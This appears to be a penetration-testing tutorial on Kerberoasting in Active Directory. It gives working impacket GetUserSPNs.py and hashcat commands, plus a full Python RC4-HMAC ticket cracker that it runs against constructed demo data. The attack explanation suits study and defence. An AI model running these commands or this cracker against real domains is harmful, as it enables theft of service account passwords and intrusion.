<aside> 📌 Summary
</aside>
Kerberoasting is a technique used to exploit weak service account passwords in a Microsoft Active Directory environment. Any authenticated domain user can request a Kerberos ticket-granting service (TGS) ticket for any account that has a Service Principal Name (SPN) registered, and the encrypted part of that ticket is protected with a key derived from the service account's password: the NT hash for RC4-HMAC (etype 23), or a PBKDF2-derived key for AES (etype 17/18). Nothing in the ticket is "decrypted" outright. The attacker takes the ticket offline and guesses passwords: each candidate is turned into a key, the key is tried against the ticket, and a correct guess is recognised because the ticket's integrity check verifies. A weak password is therefore the only thing that makes the attack work, and attackers request an RC4 ticket whenever the account still allows it, because NT-hash candidates are far cheaper to test than AES keys.

In normal conditions, a client presents this TGS to the service (a SQL or web server, for example) to get access to it. Here we never present it: we only want the ticket blob, because it lets us crack the service account password offline without touching the service again.

Nice video which goes a bit deeper
Once again the https://github.com/fortra/impacket library provides the tool. This time we use GetUserSPNs.py, which lists the accounts that have an SPN and, with -request, asks the domain controller for a TGS for each of them and prints the tickets in hashcat/John format.
GetUserSPNs.py ORB.local/lkisaka:Password1 -dc-ip 10.0.0.12 -request
<domain>/<user>:<password>: credentials of any domain account; no special privilege is needed
-dc-ip: the IP of the domain controller
-request: request a TGS for every SPN found and print it in hashcat format
Add -outputfile TGS.hash to save the tickets straight into the file used by hashcat below.
<aside>
💡 Note: unlike some other tools, this one requires the full domain name (FQDN), here ORB.local, not the NetBIOS name ORB.
</aside>
Find a little more about Hashcat password cracking here: Password Cracking with Hashcat. This time we are cracking a Kerberos 5 TGS-REP hash, hash mode 13100, which is etype 23 (RC4-HMAC). If the service account only allows AES, GetUserSPNs.py prints a $krb5tgs$17$ or $krb5tgs$18$ line instead; those need mode 19600 or 19700 respectively and crack far more slowly, since every guess costs a 4096-iteration PBKDF2 instead of one MD4.
hashcat TGS.hash -m 13100 /usr/share/wordlists/rockyou.txt
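The summary above says the ticket is "cracked" rather than decrypted, and the hashcat command performs exactly that check. The following added example (mine, not code from this page, from impacket or from hashcat) implements the per-guess test for an etype 23 ticket: the NT hash derived from each candidate, the RFC 4757 key derivation, the RC4 decryption and the HMAC-MD5 checksum comparison, then runs a small wordlist against a ticket in the $krb5tgs$23$ format GetUserSPNs.py prints. The account svc_sql, the SPN, the password Summer2024!, the wordlist and the ticket body are constructed for the demo, and the KDC's random confounder is fixed so the output is reproducible.

```python
# Offline check behind Kerberoasting: RC4-HMAC (etype 23) TGS verification in pure Python.
# Added example with constructed data; not code from the page, impacket or hashcat.
import hashlib
import hmac
import struct
from typing import Iterable, Optional


def _rol(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320). Implemented here because hashlib's md4 is often disabled under OpenSSL 3."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", 8 * len(data))
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (  # (mix function, additive constant, shift table, message-word order)
        (lambda x, y, z: (x & y) | (~x & z), 0, (3, 7, 11, 19), range(16)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for f, k, shifts, order in rounds:
            for i, w in enumerate(order):
                a = _rol((a + f(b, c, d) + X[w] + k) & 0xFFFFFFFF, shifts[i % 4])
                a, b, c, d = d, a, b, c
        h = [(v + r) & 0xFFFFFFFF for v, r in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """The RC4-HMAC Kerberos key is simply the NT hash: MD4 of the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


KU_TGS_REP_TICKET = 2  # RFC 4120 key usage for a ticket's enc-part, encrypted under the service key


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes) -> tuple:
    """RFC 4757 encryption as the KDC performs it; returns (checksum, edata)."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    checksum = _hmac_md5(k1, confounder + plaintext)
    k3 = _hmac_md5(k1, checksum)
    return checksum, rc4(k3, confounder + plaintext)


def rc4_hmac_check(key: bytes, usage: int, checksum: bytes, edata: bytes) -> bool:
    """What a cracker does per candidate: derive K3, decrypt, and see whether the HMAC matches."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    k3 = _hmac_md5(k1, checksum)
    return hmac.compare_digest(_hmac_md5(k1, rc4(k3, edata)), checksum)


def krb5tgs_line(user: str, realm: str, spn: str, checksum: bytes, edata: bytes) -> str:
    """Hashcat 13100 / GetUserSPNs.py output format for an etype 23 ticket."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${checksum.hex()}${edata.hex()}"


def parse_krb5tgs_line(line: str) -> tuple:
    if not line.startswith("$krb5tgs$23$*"):
        raise ValueError("only etype 23 (RC4-HMAC) lines are handled here")
    head, tail = line[len("$krb5tgs$23$*"):].split("*$", 1)
    user, realm, spn = head.split("$", 2)
    checksum, edata = tail.split("$", 1)
    return user, realm, spn, bytes.fromhex(checksum), bytes.fromhex(edata)


def crack_krb5tgs(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Guess passwords until one yields a key under which the ticket's checksum verifies."""
    _, _, _, checksum, edata = parse_krb5tgs_line(line)
    for candidate in wordlist:
        if rc4_hmac_check(nt_hash(candidate), KU_TGS_REP_TICKET, checksum, edata):
            return candidate
    return None


# Constructed demo data (hypothetical account, SPN, password and ticket body; not a real capture).
SERVICE_PASSWORD = "Summer2024!"
CONFOUNDER = bytes(range(8))  # the KDC uses 8 random bytes; fixed here so the output is reproducible
TICKET_BODY = b"stand-in for the ASN.1 EncTicketPart of svc_sql in ORB.local"
WORDLIST = ["123456", "Password1", "Winter2023!", "Summer2024!", "letmein"]


def demo_line() -> str:
    cksum, edata = rc4_hmac_encrypt(nt_hash(SERVICE_PASSWORD), KU_TGS_REP_TICKET, TICKET_BODY, CONFOUNDER)
    return krb5tgs_line("svc_sql", "ORB.LOCAL", "MSSQLSvc/sql01.ORB.local~1433", cksum, edata)


if __name__ == "__main__":
    line = demo_line()
    print(line)
    print("cracked:", crack_krb5tgs(line, WORDLIST))
```

Each candidate costs one MD4, three HMAC-MD5 calls and an RC4 pass, which is why RC4 tickets fall so quickly to a GPU; an AES ticket (etype 17/18) needs a 4096-iteration PBKDF2-HMAC-SHA1 per guess before the same kind of check, which is orders of magnitude slower. Note the parser stops at etype 23 on purpose: a $krb5tgs$17$ or $krb5tgs$18$ line has a different key derivation and should go to hashcat mode 19600 or 19700 rather than be silently mishandled.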